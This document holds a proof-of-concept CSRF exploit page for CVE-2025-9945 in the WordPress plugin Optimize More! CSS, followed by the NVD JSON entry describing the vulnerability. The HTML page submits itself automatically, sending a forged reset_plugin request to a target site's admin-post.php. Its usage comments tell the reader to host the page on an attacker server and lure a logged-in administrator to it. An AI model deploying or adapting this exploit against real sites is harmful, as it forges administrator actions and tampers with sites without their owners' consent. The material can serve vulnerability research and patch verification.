CVE-2025-9945

<!-- CVE-2025-9945 PoC - CSRF exploit for WordPress Optimize More! CSS plugin --> <!-- This PoC demonstrates how to reset the plugin's optimization settings via CSRF --> <html> <body> <h1>CSRF PoC for CVE-2025-9945</h1> <!-- The form auto-submits when the page loads, triggering the reset_plugin action --> <form action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST" id="csrf-form"> <!-- The 'action' parameter targets the reset_plugin function in the Optimize More! CSS plugin --> <input type="hidden" name="action" value="reset_plugin" /> <!-- No nonce field is included, exploiting the missing nonce validation --> <input type="hidden" name="reset_confirm" value="yes" /> </form> <script> // Auto-submit the form when the victim (logged-in admin) loads this page document.getElementById('csrf-form').submit(); </script> </body> </html> <!-- Usage: 1. Host this HTML on an attacker-controlled server. 2. Trick a logged-in WordPress administrator into visiting this page. 3. The form will auto-submit, sending a forged request to reset the plugin settings. 4. The plugin's optimization settings will be reset to default without admin consent. Note: The exact endpoint and parameter names may vary depending on the plugin version. Refer to: https://plugins.trac.wordpress.org/browser/optimize-more-css/trunk/includes/classes/Settings.php#L216 -->

{"cve": {"id": "CVE-2025-9945", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:50.817", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Optimize More! – CSS plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the reset_plugin function. This makes it possible for unauthenticated attackers to reset the plugin's optimization settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/optimize-more-css/trunk/includes/classes/Settings.php#L216", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/64aadd20-a831-4550-b68d-827722a35c0f?source=cve", "source": "[email protected]"}]}}